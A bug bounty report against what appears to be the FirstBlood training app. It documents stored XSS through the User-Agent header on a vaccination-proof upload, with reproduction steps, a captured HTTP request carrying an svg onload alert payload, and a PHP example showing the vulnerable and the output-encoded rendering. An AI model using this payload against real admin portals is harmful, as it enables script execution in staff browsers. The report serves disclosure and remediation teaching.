FirstBlood-#917: The User Agent parameter is vulnerable to XSS in the vaccination-manager portal.
This issue was discovered on FirstBlood v2

On 2021-10-30, vigilante Level 4 reported:


The vaccination-manager portal is showing a number of fields, one of which is "User Agent".

I kept trying for XSS in the email address and in the end, noticed that the "User Agent" field doesn't do any filtering.

Steps to Reproduce:

  1. Navigate to /vaccination-manager/login.php and log in to the portal. (I reported how in a previous bug)
  2. Keep the portal open and upload a new proof of vaccination.
  3. Capture the request with Burp and modify the User Agent by adding an XSS payload to it <svg\/onload=alert`1`>.
POST /vaccination-manager/pub/submit-vaccination-proof.php HTTP/1.1
Cookie: vaccination_manager=1169e091578618a592da0af78e85defa2760148f89bff98baf1aea6e22226668; doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; drps=a1591376de74895e99a25819f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0<svg/onload=alert`1`>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13249935105080366202509426831
Content-Length: 16725
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

Content-Disposition: form-data; name="email"

[email protected]
Content-Disposition: form-data; name="vaccination_proof"; filename="systembash.jpg"
Content-Type: image/jpeg

  4. Refresh the vaccine-manager portal, you will see an XSS pop up.


We are able to execute JavaScript in the victims' browser.

P2 High

Endpoint: /vaccination-manager/pub/submit-vaccination-proof.php

Parameter: User Agent

Payload: <svg\/onload=alert`1`>

FirstBlood ID: 29
Vulnerability Type: Stored XSS

When uploading a vaccine proof, it is possible to achieve stored XSS against admins via the User-Agent header. As this value typically can't be user-controlled, the developers did not think it was 'worth' protecting against XSS.
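
The root cause described above is a stored request header rendered into the admin portal without output encoding. The PHP below is an added example, not FirstBlood's own code: the function names, the row layout and the length limit are assumptions, and the User-Agent value is the one from the report, embedded as constructed sample data.

```php
<?php
declare(strict_types=1);

// Constructed sample record (field name is an assumption); the value is the
// User-Agent header from the report, stored exactly as it was received.
$submission = [
    'user_agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) '
                  . 'Gecko/20100101 Firefox/93.0<svg/onload=alert`1`>',
];

// Vulnerable pattern: the header value is concatenated into HTML as-is,
// so any markup inside it becomes part of the admin's page.
function renderRowUnsafe(array $row): string
{
    return '<tr><td>' . $row['user_agent'] . '</td></tr>';
}

// Encode at output time so the value is always treated as text.
// ENT_QUOTES also covers attribute contexts; ENT_SUBSTITUTE replaces
// invalid UTF-8 instead of returning an empty string.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened pattern: request headers are encoded like any form field,
// because the client controls them just as fully.
function renderRowSafe(array $row): string
{
    return '<tr><td>' . h($row['user_agent']) . '</td></tr>';
}

// Defence in depth at write time (hypothetical helper): strip control
// characters and cap the length before storing. This does not replace
// output encoding; the stored value is still untrusted.
function normaliseUserAgent(string $ua, int $maxLen = 512): string
{
    $ua = preg_replace('/[\x00-\x1F\x7F]/', '', $ua) ?? '';
    return substr($ua, 0, $maxLen);
}

echo "unsafe: ", renderRowUnsafe($submission), PHP_EOL;

$submission['user_agent'] = normaliseUserAgent($submission['user_agent']);
echo "safe:   ", renderRowSafe($submission), PHP_EOL;
```

In the hardened output the `<svg ...>` text reaches the browser as `&lt;svg ...&gt;`, so the portal displays it instead of parsing it as an element.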